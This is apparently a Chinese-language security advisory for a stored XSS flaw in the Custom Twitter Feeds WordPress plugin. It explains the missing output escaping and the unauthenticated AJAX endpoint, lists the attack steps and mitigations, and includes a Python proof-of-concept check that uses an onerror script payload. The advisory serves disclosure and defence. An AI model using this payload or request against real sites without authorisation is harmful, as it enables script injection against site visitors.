CVE-2026-6177 CVSS 7.2 高危

CVE-2026-6177 Custom Twitter Feeds存储型XSS漏洞

披露日期: 2026-05-13

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-6177

漏洞类型

存储型跨站脚本攻击 (Stored XSS)

CVSS评分

7.2 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Custom Twitter Feeds (WordPress Plugin)

漏洞概述

WordPress插件Custom Twitter Feeds在2.5.4及更早版本中存在存储型跨站脚本（XSS）漏洞。该漏洞源于`CTF_Display_Elements::get_post_text()`函数输出转义不足，未认证用户可通过AJAX动作`ctf_get_more_posts`直接输出未转义的缓存推文数据。攻击者可利用此漏洞在受影响端点注入并执行任意恶意Web脚本。

技术细节

该漏洞的核心在于插件处理缓存推文数据时缺乏有效的输出转义机制。具体而言，插件中的`CTF_Display_Elements::get_post_text()`函数在渲染缓存推文文本时，仅使用了`nl2br()`函数处理换行，完全缺失了HTML实体转义步骤。更为严重的是，`ctf_get_more_posts` AJAX操作接口未设置身份验证门槛，直接将未经过滤的缓存数据输出。攻击者若能通过发布恶意推文或利用其他途径将含有恶意HTML/JavaScript的内容写入缓存，任何访问该AJAX端点的用户都会触发脚本执行，从而构成存储型XSS攻击。

攻击链分析

STEP 1

步骤1

攻击者发布包含恶意JavaScript代码的推文，或利用其他漏洞将恶意内容注入到目标站点的推文缓存中。

STEP 2

步骤2

目标WordPress站点的Custom Twitter Feeds插件抓取并缓存了该恶意推文内容。

STEP 3

步骤3

攻击者诱导受害者访问特定的URL，或直接向未认证的AJAX端点`ctf_get_more_posts`发起请求。

STEP 4

步骤4

服务器端通过`nl2br()`处理后直接输出未转义的缓存数据，导致受害者浏览器解析并执行恶意脚本。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# Proof of Concept for CVE-2026-6177
# This script demonstrates triggering the stored XSS via the vulnerable AJAX endpoint.
# Note: The malicious tweet must be cached by the target site first.

import requests

def check_poc(target_site):
    # The vulnerable AJAX action
    url = f"{target_site}/wp-admin/admin-ajax.php"
    
    # Payload parameters
    data = {
        "action": "ctf_get_more_posts",
        # Additional parameters like 'feed_id', 'offset' may be required depending on config
    }

    try:
        response = requests.post(url, data=data)
        
        # Check if the response reflects unescaped HTML (e.g., <img> tag)
        # Assuming the cached tweet contains: <img src=x onerror=alert(1)>
        if "<img" in response.text and "alert(1)" in response.text:
            print("[+] Vulnerability Confirmed: Unescaped script found in response.")
            return True
        else:
            print("[-] Vulnerability not detected or payload not cached yet.")
            return False
    except Exception as e:
        print(f"[!] Error: {e}")

if __name__ == "__main__":
    target = "http://target-wordpress-site.com"
    check_poc(target)

影响范围

Custom Twitter Feeds <= 2.5.4

防御指南

临时缓解措施

如果不能立即升级，建议暂时禁用Custom Twitter Feeds插件以阻断攻击面。或者配置Web应用防火墙（WAF）规则，检测并拦截响应中包含未转义脚本标签的流量，同时对`/wp-admin/admin-ajax.php`接口实施更严格的访问控制。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表